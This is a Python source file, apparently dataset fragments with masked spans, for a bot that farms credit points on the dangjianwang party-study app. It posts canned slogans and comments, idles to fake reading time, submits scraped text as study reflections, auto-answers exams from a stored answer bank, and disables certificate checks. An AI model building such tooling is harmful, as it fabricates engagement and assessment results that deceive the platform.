return excuteTimes\n\n def getToken(self):\n \"\"\"\n 获得一个连接的token\n 每个连接都需要使用到\n :return:\n \"\"\"\n data = {'appid': self.appid, 'username': self.username, 'password':\n self.password}\n longinurl = 'https://mapi.dangjianwang.com/v3_1/login'\n r = self.session.post(url=longinurl, data=data, verify=False)\n rjson = r.json()\n if rjson['code'] == '200':\n return rjson['token']\n else:\n print('token 获得失败')\n return None\n\n def getRJson(self, url):\n data = {'token': self.token, 'appid': self.appid}\n return self.session.post(url=url, data=data, verify=False).json()\n\n def getUserInfo(self):\n \"\"\"\n 获得一大串用户的信息,暂时没用\n :return:\n \"\"\"\n infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'\n return self.getRJson(url=infoUrl)\n\n def getCredItinfoToday(self):\n \"\"\"\n 获得人员当前的得分等级参数\n :return:\n \"\"\"\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\n info = self.getRJson(url=creditInfourl)\n fullScore = info['data']['full']\n gainScore = info['data']['gain']\n currentLevel = info['data']['level']\n username = info['data']['name']\n ret = {'fullScore': fullScore, 'gainScore': gainScore,\n 'currentLevel': currentLevel, 'username': username}\n return ret\n\n def getCredItinfo(self):\n \"\"\"\n 获得用户的今日积分状态\n 可用来判断是否需要再继续流程\n 数据如下\n ('35', [('连续登录', '3/3'), ('手机端登录', '2/2'), ('信息评论', '10/10'), ('党员视角发布', '4/4'), ('互助广场回答', '2/2'), ('学习资料写体会', '5/5'), ('在线阅读学习资料', '5/5'), ('在线知识竞答', '4/4')])\n :return:(haved_credit, credit_detail)\n \"\"\"\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\n haved_credit = 0\n credit_detail = {}\n info = self.getRJson(url=creditInfourl)\n for k, v in info.items():\n if k == 'data':\n for k2, v2 in v.items():\n if k2 == 'haved_credit':\n haved_credit = v2\n if k2 == 'credit_detail':\n for i in v2:\n credit_detail.update({i['title']: i['score']})\n return haved_credit, credit_detail\n\n def getPages(self, urls):\n pages = []\n for url in urls:\n data = self.getRJson(url=url)\n for k, v 
in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['title'], i['id']))\n return pages\n\n def getPagesII(self, urls):\n\n def getRJson(url):\n data = {'token': self.token, 'appid': self.appid, 'type_id':\n '791', 'page_index': '1'}\n return self.session.post(url=url, data=data, verify=False).json()\n pages = []\n for url in urls:\n data = getRJson(url=url)\n for k, v in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['name'], i['id']))\n return pages\n\n def doThumb(self, id):\n \"\"\"\n 点赞函数,操作与id对应的页面\n 每次记录对应的信息到文件\n :return:\n \"\"\"\n contents = ['关注', '关注!', '关注!!']\n data = {'id': id, 'comment': random.choice(contents), 'token': self\n .token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n print(rjson)\n if rjson['code'] == '1003':\n self.token = self.getToken()\n elif rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.thumbedPages.append(id)\n for i in list(set(self.thumbPageList)):\n if id == i[1]:\n temp = {'title': i[0]}\n self.thumbResults.update(temp)\n log = '信息点赞:\\n主题: {}\\n提交:{}'.format(i[0], data[\n 'comment'])\n detail = '{} 主题:{}\\n回复:{}\\n'.format(self.\n getCurrentTime(), i[0], data['comment'])\n write2File(self, './results/', 'result.txt', log)\n thumbInfo = {'title': i[0], 'reply': data['comment']}\n self.thumbPages.remove(id)\n self.writeThumb2File(id=id)\n return detail, thumbInfo\n elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':\n print('因评论过快,等待一段时间')\n time.sleep(20)\n else:\n print('rjson', rjson)\n self.thumbedPages.remove(id)\n self.writeThumb2File(id=id)\n log = '点赞:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n time.sleep(10)\n\n def doHelp(self, id, callback=None):\n \"\"\"\n 互助功能\n :param id:\n :return:\n \"\"\"\n detail = ''\n helpInfo = None\n log = ''\n content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', 
'发展史第一要务,人才是第一资源,创新是第一动力。',\n '要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']\n data = {'id': id, 'content': random.choice(content), 'token': self.\n token, 'appid': self.appid}\n print(data)\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.helpedPages.append(id)\n self.helpPages.remove(id)\n for i in self.helpPageList:\n if id == i[1]:\n curTime = self.getCurrentTime()\n self.helpResults.update({'title': id[0]})\n log = '互助:\\n主题: {}\\n提交内容: {}'.format(i[0], rjson[\n 'comment'])\n write2File(self, './results/', 'result.txt', log)\n detail = '{} 主题: {}\\n提交内容: {}\\n'.format(curTime, i[\n 0], rjson['comment'].strip())\n helpInfo = {'title': i[0], 'reply': rjson['comment']}\n else:\n pass\n else:\n pass\n log = '帮助:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n return detail, log, helpInfo\n\n def doView(self):\n \"\"\"\n 党员视角发布功能\n\n :return:\n \"\"\"\n content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']\n data = {'content': random.choice(content), 'token': self.token,\n 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.viewsResults.append(1)\n else:\n pass\n log = '党员视角:{}'.format(rjson)\n detail = '{} 党员视角:\\n发布内容:{}\\n'.format(self.getCurrentTime(), rjson[\n 'data']['content'])\n publicContent = rjson['data']['content']\n return detail, publicContent\n\n def doStudy(self, mid):\n \"\"\"\n 前三个post函数的响应的三个请求\n get用来获得填写的内容\n 最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。\n :param mid:\n :return:\n \"\"\"\n interval = 60 * 5 + 5\n\n def post1():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')\n 
rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post1:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post2():\n data = {'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post2:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post3():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post3:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def get1():\n url = (\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'\n .format(self.token, mid))\n rjson = self.session.get(url=url)\n text = rjson.content\n soup = BeautifulSoup(text, 'html.parser')\n retContents = []\n for div in soup.find_all('p'):\n p = div.text.strip()\n retContents.append(p if 100 > len(p) < 200 else p[0:200])\n return random.choice(retContents)\n\n def recordFeeling(content=None):\n if not content:\n content = (\n '伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'\n )\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'content': content}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习recordFeeling:{}'.format(rjson)\n self.writeLog2File(log)\n print('in recordFeeling')\n print(log)\n if rjson['code'] == '200':\n return {'content': content}\n elif rjson['code'] == '1120':\n addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',\n '人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',\n '民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']\n return 
recordFeeling(content='{}\\n{}'.format(content,\n random.choice(addtion)))\n else:\n return None\n\n def readTime():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'time': interval}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习readTime:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n post1()\n time.sleep(1)\n post2()\n time.sleep(1)\n post3()\n time.sleep(1)\n content = get1()\n time.sleep(1)\n count = 0\n print('开始学习请稍后')\n for i in range(interval):\n count += 1\n if count % 30 == 0:\n print('已用时{}秒'.format(count))\n time.sleep(1)\n print('填写的学习体会', content)\n self.studyRsults.update(recordFeeling(content=content))\n time.sleep(1)\n readTime()\n time.sleep(1)\n pass\n\n def doExam(self):\n \"\"\"\n\n :param self:\n :return:\n \"\"\"\n ids = []\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'\n rjson = self.session.post(url=examlistUrl, data=data, verify=False\n ).json()\n time.sleep(0.3)\n print('*' * 99)\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'\n rjson = self.session.post(url=banklistUrl, data=data, verify=False\n ).json()\n for i in rjson['data']:\n tem = i['bank_name'], i['id']\n self.examlist.append(tem)\n if i['bank_name'] == '十九大报告100题(单选)':\n temp = {'title': i['bank_name'], 'detail': i['detail'],\n 'id': i['id']}\n self.examC19Info.append(temp)\n time.sleep(0.3)\n print('*' * 99)\n data = {'bank': '6', 'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n aa = rjson['data']\n paper = aa['id']\n for i in aa['questions']:\n temp = {'id': i['id'], 'content': i['content']}\n 
ids.append(temp)\n print('*' * 99)\n time.sleep(0.5)\n answers = []\n for i in ids:\n correctAnswer = Qa.objects.filter(question__contains=i['content'])[\n 0]\n answerText = correctAnswer.answerText\n answer = correctAnswer.answer\n temp = {'index': i['id'], 'answer': answer}\n qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}\n self.qaList.append(qa)\n print(qa, i['content'])\n answers.append(temp)\n time.sleep(1)\n hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,\n 'answers': json.dumps(answers)}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'\n rjson = self.session.post(url=commitUrl, data=hdata, verify=False\n ).json()\n print(rjson)\n print(self.examlist)\n print(self.examC19Info)\n print(self.qaList)\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Runner:\n\n def __init__(self, appid='TJZHDJ01', username='', password=''):\n urllib3.disable_warnings()\n self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')\n self.username = username\n self.password = password\n self.thumbedFilePath = './lib/'.format(username)\n self.logFilePath = './log/'.format(username)\n self.errFilePath = './err/'.format(username)\n self.thumbedFileList = []\n self.debug = True\n self.session = requests.session()\n self.appid = appid\n self.headers = {'User-Agent':\n 'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'\n , 'header_version': '80', 'system': 'android', 'Connection':\n 'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}\n self.token = self.getToken()\n time.sleep(0.1)\n self.thumbPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Learn/List',\n 'https://mapi.dangjianwang.com/v3_1/Activities/List',\n 'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])\n self.thumbPages = [i[1] for i in self.thumbPageList]\n time.sleep(0.1)\n self.helpPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Help/List'])\n self.helpPages = [i[1] for i in self.helpPageList]\n self.helpResults = {}\n time.sleep(0.1)\n self.studyPageList = self.getPagesII(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])\n self.studyPages = [i[1] for i in self.studyPageList]\n time.sleep(0.1)\n self.studyRsults = {}\n self.thumbedPages = []\n self.thumbResults = {}\n self.helpedPages = []\n self.multiThumbed = []\n self.viewsResults = []\n self.examC19Info = []\n self.examlist = []\n self.qaList = []\n <mask token>\n\n def writeErr2File(self, err):\n path = self.logFilePath\n fullPath = '{}{}err.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, err))\n print('err已经写入{}'.format(fullPath))\n\n def writeLog2File(self, log):\n path = 
self.logFilePath\n fullPath = '{}{}logs.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, log))\n print('log已经写入{}'.format(fullPath))\n\n def writeThumb2File(self, id):\n path = self.thumbedFilePath\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write(',{}'.format(id))\n print('点赞记录已经写入{}'.format(fullPath))\n\n def getThumbFromFile(self):\n \"\"\"\n\n :return: 文件中id组成的列表\n \"\"\"\n path = self.thumbedFilePath\n inFileList = []\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\n if not os.path.exists(fullPath):\n return fullPath\n with open(fullPath, 'r') as f:\n inFileList.extend(list(set(f.readlines()[0].split(','))))\n with open(fullPath, 'w') as f1:\n f1.write(','.join(sorted(inFileList)))\n return inFileList\n\n def getExcuteTimes(self):\n \"\"\"\n 返回点赞等自动执行的次数的字典\n :return:\n \"\"\"\n excuteTimes = {}\n credInfo = self.getCredItinfo()\n print(credInfo)\n currentScore = credInfo[0]\n thumbScore = credInfo[1]['信息评论'].split('/')[0]\n thumbExcuteTimes = 10 - int(thumbScore)\n excuteTimes.update({'thumb': thumbExcuteTimes})\n helpScore = credInfo[1]['互助广场回答'].split('/')[0]\n helpExctuteTimes = 2 - int(helpScore)\n excuteTimes.update({'help': helpExctuteTimes})\n viewScore = credInfo[1]['党员视角发布'].split('/')[0]\n viewExcuteTimes = int((4 - int(viewScore)) / 2)\n excuteTimes.update({'view': viewExcuteTimes})\n examScore = credInfo[1]['在线知识竞答'].split('/')[0]\n examExcuteTimes = int((4 - int(examScore)) / 2)\n excuteTimes.update({'exam': examExcuteTimes})\n flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]\n ['在线阅读学习资料'].split('/')[0])\n flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]\n ['学习资料写体会'].split('/')[0])\n examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0\n excuteTimes.update({'study': examExcuteTimes})\n 
return excuteTimes\n\n def getToken(self):\n \"\"\"\n 获得一个连接的token\n 每个连接都需要使用到\n :return:\n \"\"\"\n data = {'appid': self.appid, 'username': self.username, 'password':\n self.password}\n longinurl = 'https://mapi.dangjianwang.com/v3_1/login'\n r = self.session.post(url=longinurl, data=data, verify=False)\n rjson = r.json()\n if rjson['code'] == '200':\n return rjson['token']\n else:\n print('token 获得失败')\n return None\n\n def getRJson(self, url):\n data = {'token': self.token, 'appid': self.appid}\n return self.session.post(url=url, data=data, verify=False).json()\n\n def getUserInfo(self):\n \"\"\"\n 获得一大串用户的信息,暂时没用\n :return:\n \"\"\"\n infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'\n return self.getRJson(url=infoUrl)\n\n def getCredItinfoToday(self):\n \"\"\"\n 获得人员当前的得分等级参数\n :return:\n \"\"\"\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\n info = self.getRJson(url=creditInfourl)\n fullScore = info['data']['full']\n gainScore = info['data']['gain']\n currentLevel = info['data']['level']\n username = info['data']['name']\n ret = {'fullScore': fullScore, 'gainScore': gainScore,\n 'currentLevel': currentLevel, 'username': username}\n return ret\n\n def getCredItinfo(self):\n \"\"\"\n 获得用户的今日积分状态\n 可用来判断是否需要再继续流程\n 数据如下\n ('35', [('连续登录', '3/3'), ('手机端登录', '2/2'), ('信息评论', '10/10'), ('党员视角发布', '4/4'), ('互助广场回答', '2/2'), ('学习资料写体会', '5/5'), ('在线阅读学习资料', '5/5'), ('在线知识竞答', '4/4')])\n :return:(haved_credit, credit_detail)\n \"\"\"\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\n haved_credit = 0\n credit_detail = {}\n info = self.getRJson(url=creditInfourl)\n for k, v in info.items():\n if k == 'data':\n for k2, v2 in v.items():\n if k2 == 'haved_credit':\n haved_credit = v2\n if k2 == 'credit_detail':\n for i in v2:\n credit_detail.update({i['title']: i['score']})\n return haved_credit, credit_detail\n\n def getPages(self, urls):\n pages = []\n for url in urls:\n data = self.getRJson(url=url)\n for k, v 
in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['title'], i['id']))\n return pages\n\n def getPagesII(self, urls):\n\n def getRJson(url):\n data = {'token': self.token, 'appid': self.appid, 'type_id':\n '791', 'page_index': '1'}\n return self.session.post(url=url, data=data, verify=False).json()\n pages = []\n for url in urls:\n data = getRJson(url=url)\n for k, v in data.items():\n if k == 'data':\n for i in v:\n pages.append((i['name'], i['id']))\n return pages\n\n def doThumb(self, id):\n \"\"\"\n 点赞函数,操作与id对应的页面\n 每次记录对应的信息到文件\n :return:\n \"\"\"\n contents = ['关注', '关注!', '关注!!']\n data = {'id': id, 'comment': random.choice(contents), 'token': self\n .token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n print(rjson)\n if rjson['code'] == '1003':\n self.token = self.getToken()\n elif rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.thumbedPages.append(id)\n for i in list(set(self.thumbPageList)):\n if id == i[1]:\n temp = {'title': i[0]}\n self.thumbResults.update(temp)\n log = '信息点赞:\\n主题: {}\\n提交:{}'.format(i[0], data[\n 'comment'])\n detail = '{} 主题:{}\\n回复:{}\\n'.format(self.\n getCurrentTime(), i[0], data['comment'])\n write2File(self, './results/', 'result.txt', log)\n thumbInfo = {'title': i[0], 'reply': data['comment']}\n self.thumbPages.remove(id)\n self.writeThumb2File(id=id)\n return detail, thumbInfo\n elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':\n print('因评论过快,等待一段时间')\n time.sleep(20)\n else:\n print('rjson', rjson)\n self.thumbedPages.remove(id)\n self.writeThumb2File(id=id)\n log = '点赞:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n time.sleep(10)\n\n def doHelp(self, id, callback=None):\n \"\"\"\n 互助功能\n :param id:\n :return:\n \"\"\"\n detail = ''\n helpInfo = None\n log = ''\n content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', 
'发展史第一要务,人才是第一资源,创新是第一动力。',\n '要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']\n data = {'id': id, 'content': random.choice(content), 'token': self.\n token, 'appid': self.appid}\n print(data)\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.helpedPages.append(id)\n self.helpPages.remove(id)\n for i in self.helpPageList:\n if id == i[1]:\n curTime = self.getCurrentTime()\n self.helpResults.update({'title': id[0]})\n log = '互助:\\n主题: {}\\n提交内容: {}'.format(i[0], rjson[\n 'comment'])\n write2File(self, './results/', 'result.txt', log)\n detail = '{} 主题: {}\\n提交内容: {}\\n'.format(curTime, i[\n 0], rjson['comment'].strip())\n helpInfo = {'title': i[0], 'reply': rjson['comment']}\n else:\n pass\n else:\n pass\n log = '帮助:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n return detail, log, helpInfo\n\n def doView(self):\n \"\"\"\n 党员视角发布功能\n\n :return:\n \"\"\"\n content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']\n data = {'content': random.choice(content), 'token': self.token,\n 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.viewsResults.append(1)\n else:\n pass\n log = '党员视角:{}'.format(rjson)\n detail = '{} 党员视角:\\n发布内容:{}\\n'.format(self.getCurrentTime(), rjson[\n 'data']['content'])\n publicContent = rjson['data']['content']\n return detail, publicContent\n\n def doStudy(self, mid):\n \"\"\"\n 前三个post函数的响应的三个请求\n get用来获得填写的内容\n 最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。\n :param mid:\n :return:\n \"\"\"\n interval = 60 * 5 + 5\n\n def post1():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')\n 
rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post1:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post2():\n data = {'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post2:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post3():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post3:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def get1():\n url = (\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'\n .format(self.token, mid))\n rjson = self.session.get(url=url)\n text = rjson.content\n soup = BeautifulSoup(text, 'html.parser')\n retContents = []\n for div in soup.find_all('p'):\n p = div.text.strip()\n retContents.append(p if 100 > len(p) < 200 else p[0:200])\n return random.choice(retContents)\n\n def recordFeeling(content=None):\n if not content:\n content = (\n '伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'\n )\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'content': content}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习recordFeeling:{}'.format(rjson)\n self.writeLog2File(log)\n print('in recordFeeling')\n print(log)\n if rjson['code'] == '200':\n return {'content': content}\n elif rjson['code'] == '1120':\n addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',\n '人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',\n '民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']\n return 
recordFeeling(content='{}\\n{}'.format(content,\n random.choice(addtion)))\n else:\n return None\n\n def readTime():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'time': interval}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习readTime:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n post1()\n time.sleep(1)\n post2()\n time.sleep(1)\n post3()\n time.sleep(1)\n content = get1()\n time.sleep(1)\n count = 0\n print('开始学习请稍后')\n for i in range(interval):\n count += 1\n if count % 30 == 0:\n print('已用时{}秒'.format(count))\n time.sleep(1)\n print('填写的学习体会', content)\n self.studyRsults.update(recordFeeling(content=content))\n time.sleep(1)\n readTime()\n time.sleep(1)\n pass\n\n def doExam(self):\n \"\"\"\n\n :param self:\n :return:\n \"\"\"\n ids = []\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'\n rjson = self.session.post(url=examlistUrl, data=data, verify=False\n ).json()\n time.sleep(0.3)\n print('*' * 99)\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'\n rjson = self.session.post(url=banklistUrl, data=data, verify=False\n ).json()\n for i in rjson['data']:\n tem = i['bank_name'], i['id']\n self.examlist.append(tem)\n if i['bank_name'] == '十九大报告100题(单选)':\n temp = {'title': i['bank_name'], 'detail': i['detail'],\n 'id': i['id']}\n self.examC19Info.append(temp)\n time.sleep(0.3)\n print('*' * 99)\n data = {'bank': '6', 'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n aa = rjson['data']\n paper = aa['id']\n for i in aa['questions']:\n temp = {'id': i['id'], 'content': i['content']}\n 
ids.append(temp)\n print('*' * 99)\n time.sleep(0.5)\n answers = []\n for i in ids:\n correctAnswer = Qa.objects.filter(question__contains=i['content'])[\n 0]\n answerText = correctAnswer.answerText\n answer = correctAnswer.answer\n temp = {'index': i['id'], 'answer': answer}\n qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}\n self.qaList.append(qa)\n print(qa, i['content'])\n answers.append(temp)\n time.sleep(1)\n hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,\n 'answers': json.dumps(answers)}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'\n rjson = self.session.post(url=commitUrl, data=hdata, verify=False\n ).json()\n print(rjson)\n print(self.examlist)\n print(self.examC19Info)\n print(self.qaList)\n\n def getAnswerInfo(self):\n \"\"\"\n 获得答题的结果与正确率\n :return:\n \"\"\"\n data = {'token': self.token, 'appid': self.appid, 'page_size': '20',\n 'page_index': 'page_index'}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n print(rjson)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Runner:\n\n def __init__(self, appid='TJZHDJ01', username='', password=''):\n urllib3.disable_warnings()\n self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')\n self.username = username\n self.password = password\n self.thumbedFilePath = './lib/'.format(username)\n self.logFilePath = './log/'.format(username)\n self.errFilePath = './err/'.format(username)\n self.thumbedFileList = []\n self.debug = True\n self.session = requests.session()\n self.appid = appid\n self.headers = {'User-Agent':\n 'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'\n , 'header_version': '80', 'system': 'android', 'Connection':\n 'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}\n self.token = self.getToken()\n time.sleep(0.1)\n self.thumbPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Learn/List',\n 'https://mapi.dangjianwang.com/v3_1/Activities/List',\n 'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])\n self.thumbPages = [i[1] for i in self.thumbPageList]\n time.sleep(0.1)\n self.helpPageList = self.getPages(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Help/List'])\n self.helpPages = [i[1] for i in self.helpPageList]\n self.helpResults = {}\n time.sleep(0.1)\n self.studyPageList = self.getPagesII(urls=[\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])\n self.studyPages = [i[1] for i in self.studyPageList]\n time.sleep(0.1)\n self.studyRsults = {}\n self.thumbedPages = []\n self.thumbResults = {}\n self.helpedPages = []\n self.multiThumbed = []\n self.viewsResults = []\n self.examC19Info = []\n self.examlist = []\n self.qaList = []\n\n def getCurrentTime(self):\n return datetime.datetime.now().strftime('%H:%M:%S')\n\n def writeErr2File(self, err):\n path = self.logFilePath\n fullPath = '{}{}err.txt'.format(path, self.username)\n if not os.path.exists(path):\n os.mkdir(path)\n with open(fullPath, 'a') as f:\n f.write('{}:{}\\n'.format(self.currentTime, err))\n 
